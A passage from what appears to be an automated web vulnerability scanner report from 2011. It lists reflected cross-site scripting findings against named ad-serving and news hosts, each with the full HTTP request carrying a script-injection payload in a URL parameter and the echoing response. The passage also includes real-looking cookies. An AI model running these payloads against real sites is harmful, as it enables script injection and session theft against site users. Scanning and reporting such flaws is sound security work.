Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q112411"><script>alert(1)</script>948b5d9dd28/BTRT1/728/1632556584/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.116. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b804e"><script>alert(1)</script>4cb874026ca was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1b804e"><script>alert(1)</script>4cb874026ca/728/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1b804e"><script>alert(1)</script>4cb874026ca/728/844783005/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.117. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 168c3"><script>alert(1)</script>e6ff1b42792 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728168c3"><script>alert(1)</script>e6ff1b42792/11297647300104@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728168c3"><script>alert(1)</script>e6ff1b42792/303112085/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.118. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f787"><script>alert(1)</script>32af85f766d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297647300104@x904f787"><script>alert(1)</script>32af85f766d HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; FarmersBranding=RocketFuelB3; id=914803576615380

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:36:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/2008971942/x904f787"><script>alert(1)</script>32af85f766d/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.119. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53250"><script>alert(1)</script>f2c52472042 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB353250"><script>alert(1)</script>f2c52472042/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB353250"><script>alert(1)</script>f2c52472042/ATTW/1H_11Q1/RON1HCPC/300/782092599/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.120. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 106f9"><script>alert(1)</script>f534803ea84 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW106f9"><script>alert(1)</script>f534803ea84/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW106f9"><script>alert(1)</script>f534803ea84/1H_11Q1/RON1HCPC/300/381312021/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.121. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e043d"><script>alert(1)</script>d97c917261a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1e043d"><script>alert(1)</script>d97c917261a/RON1HCPC/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 366
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1e043d"><script>alert(1)</script>d97c917261a/RON1HCPC/300/1322201168/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.122. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 340af"><script>alert(1)</script>fde4b5f29d6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC340af"><script>alert(1)</script>fde4b5f29d6/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC340af"><script>alert(1)</script>fde4b5f29d6/300/423184803/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.123. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1b98"><script>alert(1)</script>b58eeecf04b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300a1b98"><script>alert(1)</script>b58eeecf04b/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300a1b98"><script>alert(1)</script>b58eeecf04b/757931301/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.124. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8d6"><script>alert(1)</script>9f9e61b8a83 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x904e8d6"><script>alert(1)</script>9f9e61b8a83 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/801120019/x904e8d6"><script>alert(1)</script>9f9e61b8a83/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

3.125. http://bid.openx.net/json [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 8223a<script>alert(1)</script>b163a0573ec was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_425158943748223a<script>alert(1)</script>b163a0573ec&pid=3a257c12-87aa-4e92-af61-e47d5422d9f7&s=160x600&f=1&cid=oxpv1%3A34-632-1929-1419-4033&hrid=02e3d43e8047564dc7fdfdccc682e0aa-1297647245&url=http%3A%2F%2Fadserver.adtechus.com%2Fadiframe%2F3.0%2F5235%2F1131606%2F0%2F154%2FADTECH%3Bcookie%3Dinfo%3Btarget%3D_blank%3Bkey%3Dkey1%2Bkey2%2Bkey3%2Bkey4%3Bgrp%3D000001 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x2ff8ff.js&size_id=9&account_id=6005&site_id=12414&size=160x60
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1297527888; fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0GlkYAAA0iY5Vg8AAAA=; _wc[1297527893965]=H4sIAAAAAAAAAONgYGRg0GnkYGBiYOiq5WBgZmAozGQAAHz1QNYWAAAA; i=8e1bb757-a622-431b-967f-869e18a071fe

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=a5f1e488-0086-4735-aa4d-21bbfb1228f5; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1297647248; version=1; path=/; domain=.openx.net; max-age=63072000;
Set-Cookie: _wc[1297527893965]=; version=1; path=/; domain=.openx.net; max-age=0;
Set-Cookie: fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0GlkYAAA0iY5Vg8AAAA=; version=1; path=/; domain=.openx.net; max-age=31536000;

OXM_425158943748223a<script>alert(1)</script>b163a0573ec({"r":null});

3.126. http://blogs.desmoinesregister.com/dmr/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /dmr/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33191"><script>alert(1)</script>647610c6837 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr33191"><script>alert(1)</script>647610c6837/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
